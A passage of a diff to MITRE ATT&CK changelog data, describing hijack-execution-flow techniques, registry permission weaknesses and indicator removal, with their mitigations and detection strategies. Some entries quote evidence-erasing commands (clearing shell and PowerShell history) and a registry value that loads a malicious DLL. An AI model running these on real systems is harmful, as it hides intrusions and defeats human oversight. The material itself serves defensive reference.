+                            "url": "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-15 23:01:58.951000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0577: Detection Strategy for Hijack Execution Flow through the KernelCallbackTable on Windows."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 14:10:43.424000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Path Interception by PATH Environment Variable",
+                    "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. \n\nAdversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.\n\nFor example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify the $PATH variable specifying the directories to be searched.  An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/007",
+                            "external_id": "T1574.007"
+                        },
+                        {
+                            "source_name": "Elastic Rules macOS launchctl 2022",
+                            "description": "Elastic Security 7.17. (2022, February 1). Modification of Environment Variable via Launchctl. Retrieved September 28, 2023.",
+                            "url": "https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html"
+                        },
+                        {
+                            "source_name": "ExpressVPN PATH env Windows 2021",
+                            "description": "ExpressVPN Security Team. (2021, November 16). Cybersecurity lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.",
+                            "url": "https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/"
+                        },
+                        {
+                            "source_name": "uptycs Fake POC linux malware 2023",
+                            "description": "Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit: Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.",
+                            "url": "https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware"
+                        },
+                        {
+                            "source_name": "nixCraft macOS PATH variables",
+                            "description": "Vivek Gite. (2023, August 22). MacOS \u2013 Set / Change $PATH Variable Command. Retrieved September 28, 2023.",
+                            "url": "https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Stefan Kanthak"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-15 23:01:52.753000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1038: Execution Prevention",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0004: Detection Strategy for Hijack Execution Flow using Path Interception by PATH Environment Variable."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 17:48:58.999000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Path Interception by Search Order Hijacking",
+                    "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument <code>net user</code>. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then <code>cmd.exe /C net user</code> will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL](https://attack.mitre.org/techniques/T1574/001).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/008",
+                            "external_id": "T1574.008"
+                        },
+                        {
+                            "source_name": "Microsoft Environment Property",
+                            "description": "Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.",
+                            "url": "https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN"
+                        },
+                        {
+                            "source_name": "Microsoft CreateProcess",
+                            "description": "Microsoft. (n.d.). CreateProcess function. Retrieved September 12, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa"
+                        },
+                        {
+                            "source_name": "Microsoft WinExec",
+                            "description": "Microsoft. (n.d.). WinExec function. Retrieved September 12, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec"
+                        },
+                        {
+                            "source_name": "Windows NT Command Shell",
+                            "description": "Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.",
+                            "url": "https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Stefan Kanthak"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2026-04-15 23:01:48.263000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1038: Execution Prevention",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0564: Detection Strategy for Hijack Execution Flow using Path Interception by Search Order Hijacking"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 13:51:58.519000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "Path Interception by Unquoted Path",
+                    "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\\unsafe path with space\\program.exe</code> vs. <code>\"C:\\safe path with space\\program.exe\"</code>). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\\program files\\myapp.exe</code>, an adversary may create a program at <code>C:\\program.exe</code> that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/009",
+                            "external_id": "T1574.009"
+                        },
+                        {
+                            "source_name": "Windows Privilege Escalation Guide",
+                            "description": "absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.",
+                            "url": "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/"
+                        },
+                        {
+                            "source_name": "Windows Unquoted Services",
+                            "description": "HackHappy. (2018, April 23). Windows Privilege Escalation \u2013 Unquoted Services. Retrieved August 10, 2018.",
+                            "url": "https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/"
+                        },
+                        {
+                            "source_name": "Help eliminate unquoted path",
+                            "description": "Mark Baggett. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved November 8, 2012.",
+                            "url": "https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464"
+                        },
+                        {
+                            "source_name": "Microsoft CurrentControlSet Services",
+                            "description": "Microsoft. (2017, April 20). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved March 16, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Stefan Kanthak"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2026-04-15 23:01:45.477000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1038: Execution Prevention",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0064: Detection Strategy for Hijack Execution Flow through Path Interception by Unquoted Path"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-12 20:43:53.998000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Services File Permissions Weakness",
+                    "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/010",
+                            "external_id": "T1574.010"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Stefan Kanthak",
+                        "Travis Smith, Tripwire"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-15 23:02:37.539000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit",
+                            "M1052: User Account Control"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0436: Detection Strategy for Hijack Execution Flow through Services File Permissions Weakness."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 11:42:14.444000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Services Registry Permissions Weakness",
+                    "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\\SYSTEM\\CurrentControlSet\\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service\u2019s Registry tree. For example, the <code>FailureCommand</code> key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe <code>Performance</code> key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the <code>Performance</code> key is not already present and if an adversary-controlled user has the <code>Create Subkey</code> permission, adversaries may create the <code>Performance</code> key in the service\u2019s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the <code>Parameters</code> key, which can reference malicious drivers file paths. This technique has been identified to be a method of abuse by configuring DLL file paths within the <code>Parameters</code> key of a given services registry configuration. By placing and configuring the <code>Parameters</code> key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked.\n\nFor example, the registry path(Citation: MDSec) <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters</code>(Citation: hexacorn)(Citation: gendigital) contains the <code>AutodiaDLL</code> value, which specifies the DLL to be loaded for autodial funcitionality. An adversary could set the <code>AutodiaDLL</code> to point to a hijacked or malicious DLL:\n\n<code>\"AutodialDLL\"=\"c:\\temp\\foo.dll\"</code>\n\nThis ensures persistence, as it causes the DLL (in this case, foo.dll) to be loaded each time the Winsock 2 library is invoked.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1574/011",
+                            "external_id": "T1574.011"
+                        },
+                        {
+                            "source_name": "Tweet Registry Perms Weakness",
+                            "description": "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved September 12, 2024.",
+                            "url": "https://x.com/r0wdy_/status/936365549553991680"
+                        },
+                        {
+                            "source_name": "insecure_reg_perms",
+                            "description": "Cl\u00e9ment Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.",
+                            "url": "https://itm4n.github.io/windows-registry-rpceptmapper-eop/"
+                        },
+                        {
+                            "source_name": "hexacorn",
+                            "description": "hexacorn. (2015, January 13). Beyond good ol\u2019 Run key, Part 24. Retrieved September 25, 2025.",
+                            "url": "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/"
+                        },
+                        {
+                            "source_name": "Kansa Service related collectors",
+                            "description": "Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.",
+                            "url": "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html"
+                        },
+                        {
+                            "source_name": "malware_hides_service",
+                            "description": "Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.",
+                            "url": "https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/"
+                        },
+                        {
+                            "source_name": "MDSec",
+                            "description": "MDSec. (n.d.). Autodial(DLL)ing Your Way. Retrieved September 25, 2025.",
+                            "url": "https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/"
+                        },
+                        {
+                            "source_name": "Registry Key Security",
+                            "description": "Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.",
+                            "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN"
+                        },
+                        {
+                            "source_name": "microsoft_services_registry_tree",
+                            "description": "Microsoft. (2021, August 5). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved August 25, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree"
+                        },
+                        {
+                            "source_name": "gendigital",
+                            "description": "Threat Research Team. (2022, March 22). Operation Dragon Castling: APT group targeting betting companies. Retrieved September 25, 2025.",
+                            "url": "https://www.gendigital.com/blog/insights/research/operation-dragon-castling-apt-group-targeting-betting-companies"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Joe Gumke, U.S. Bank",
+                        "Matthew Demaske, Adaptforward",
+                        "Travis Smith, Tripwire"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2026-04-15 23:02:58.258000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1024: Restrict Registry Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0427: Detection Strategy for Hijack Execution Flow through Service Registry Premission Weakness."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:55.892000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Indicator Removal",
+                    "description": "Adversaries may selectively delete or modify artifacts generated to reduce indications of their presence and blend in with legitimate activity. Rather than broadly removing evidence, adversaries may target specific artifacts that appear anomalous or are likely to draw scrutiny, while leaving sufficient data intact to maintain the appearance of normal system behavior.\n\nArtifacts such as command histories, log entries, or file metadata may be altered in ways that align with expected user or system activity. Location, format, and type of artifact (such as command or login history) are often platform-specific, allowing adversaries to tailor modifications that minimize suspicion.\n\nThese actions may not prevent detection entirely but can delay recognition of malicious activity or reduce the fidelity of alerts by making events appear benign or consistent with routine operations. Additionally, selectively removed or modified artifacts may still be recoverable through deeper forensic analysis, though their absence or alteration can complicate timeline reconstruction and attribution.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1070",
+                            "external_id": "T1070"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Brad Geesaman, @bradgeesaman",
+                        "Ed Williams, Trustwave, SpiderLabs",
+                        "Blake Strom, Microsoft 365 Defender"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2026-04-15 15:10:02.929000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1029: Remote Data Storage",
+                            "M1041: Encrypt Sensitive Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0184: Behavioral Detection of Indicator Removal Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-31 12:32:08.228000+00:00",
+                    "modified": "2026-05-12 15:12:00.627000+00:00",
+                    "name": "Clear Command History",
+                    "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>.  \n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1070/003",
+                            "external_id": "T1070.003"
+                        },
+                        {
+                            "source_name": "Broadcom ESXi Shell Audit",
